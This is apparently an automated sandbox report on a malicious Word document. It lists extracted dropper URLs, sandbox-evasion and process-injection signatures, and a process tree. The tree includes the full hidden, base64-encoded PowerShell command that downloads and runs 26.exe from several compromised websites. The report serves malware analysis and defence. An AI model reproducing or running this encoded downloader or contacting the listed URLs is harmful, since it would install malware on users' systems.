Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
16-12-2019 19:42
General
-
Target
ddb132a2a482908f35a670ba81bd36da2e7972ac5afdc4aa61607088769774b5.doc
-
Sample
191216-3l65tdvfsn
-
SHA256
ddb132a2a482908f35a670ba81bd36da2e7972ac5afdc4aa61607088769774b5
Score
8/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://www.simple-it.org/wp-content/5ytq5ejxlc-r2pqs5bzt6-509383840/
exe.dropper
https://www.uaeneeds.com/wp-admin/iPaIUkhj/
exe.dropper
http://oki-dental.com/sys/upydu-4nmmykhbf-292/
exe.dropper
http://blog.itsaboutnature.net/confabulate-grainy/tad0m4bjt-li6lr-5546823/
exe.dropper
http://kellis.store/wp-content/sLTProK/
Signatures
-
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4984 WINWORD.EXE 3960 26.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4724 Powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3960 26.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4984 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4984 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4056 wrote to memory of 4588 4056 SppExtComObj.exe 76 PID 4724 wrote to memory of 3960 4724 Powershell.exe 80 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4724 Powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ddb132a2a482908f35a670ba81bd36da2e7972ac5afdc4aa61607088769774b5.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:4984
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:4588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABLAG4AbgBjAGgAbQBiAHcAcABmAGsAPQAnAEwAawB2AHoAcABtAHQAcgBkAHIAdQB1ACcAOwAkAFoAdwB4AG0AcgB6AGUAbgBvAHIAbgAgAD0AIAAnADIANgAnADsAJABTAHcAbgBwAGUAeAB4AHoAcABvAGwAawB3AD0AJwBRAG4AaAB3AG8AdAByAHAAYgBhACcAOwAkAEUAZABxAG0AaQBtAGQAcQBzAHcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAdwB4AG0AcgB6AGUAbgBvAHIAbgArACcALgBlAHgAZQAnADsAJABIAHYAcwBoAGcAaABkAGQAdABzAHUAYQB5AD0AJwBGAGwAZQBjAHcAegB0AGEAaABtACcAOwAkAEwAZQB6AHcAZQB2AG4AYQA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBlAFQALgB3AGUAYgBDAGwASQBlAG4AdAA7ACQAWgBxAGMAYwBhAGoAbgB2AGkAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAGkAbQBwAGwAZQAtAGkAdAAuAG8AcgBnAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADUAeQB0AHEANQBlAGoAeABsAGMALQByADIAcABxAHMANQBiAHoAdAA2AC0ANQAwADkAMwA4ADMAOAA0ADAALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHUAYQBlAG4AZQBlAGQAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQBQAGEASQBVAGsAaABqAC8AKgBoAHQAdABwADoALwAvAG8AawBpAC0AZABlAG4AdABhAGwALgBjAG8AbQAvAHMAeQBzAC8AdQBwAHkAZAB1AC0ANABuAG0AbQB5AGsAaABiAGYALQAyADkAMgAvACoAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AaQB0AHMAYQBiAG8AdQB0AG4AYQB0AHUAcgBlAC4AbgBlAHQALwBjAG8AbgBmAGEAYgB1AGwAYQB0AGUALQBnAHIAYQBpAG4AeQAvAHQAYQBkADAAbQA0AGIAagB0AC0AbABpADYAbAByAC0ANQA1ADQANgA4ADIAMwAvACoAaAB0AHQAcAA6AC8ALwBrAGUAbABsAGkAcwAuAHMAdABvAHIAZQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBzAEwAVABQAHIAbwBLAC8AJwAuACIAUwBwAEwAYABpAHQAIgAoACcAKgAnACkAOwAkAEQAYQBnAGwAcABrAHoAcABkAHcAZwA9ACcAUwBvAHEAeQB0AGgAeABhACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAHAAaABqAHIAZwBjAG4AcwBnAHMAZQBiACAAaQBuACAAJABaAHEAYwBjAGEAagBuAHYAaQApAHsAdAByAHkAewAkAEwAZQB6AHcAZQB2AG4AYQAuACIAZABgAE8AYAB3AG4ATABPAEEARABGAEkAbABlACIAKAAkAFkAcABoAGoAcgBnAGMAbgBzAGcAcwBlAGIALAAgACQARQBkAHEAbQBpAG0AZABxAHMAdwApADsAJABFAHgAeAB3AHkAbgB1AGwAdQBjAD0AJwBEAG0AZwBmAHAAeQB5AGgAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABFAGQAcQBtAGkAbQBkAHEAcwB3ACkALgAiAEwARQBuAGcAYABUAGgAIgAgAC0AZwBlACAAMgA2ADkAMgA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABBAGAAUgBUACIAKAAkAEUAZABxAG0AaQBtAGQAcQBzAHcAKQA7ACQAWgBkAGsAZABiAG8AZgBnAD0AJwBPAGMAbwByAG8AYQBjAGkAawBsAGMAbQBzACcAOwBiAHIAZQBhAGsAOwAkAFIAbwByAHkAYwBhAGQAegA9ACcAVABvAGsAdAB4AHAAdgB6AGQAbwBqAHMAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABXAHkAeQBzAHkAbQBrAHoAYQBrAGEAbwBoAD0AJwBMAGQAcgBzAHYAbQByAHAAbgB3AGcAbQBvACcA1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:4724 -
C:\Users\Admin\26.exe"C:\Users\Admin\26.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:3960
-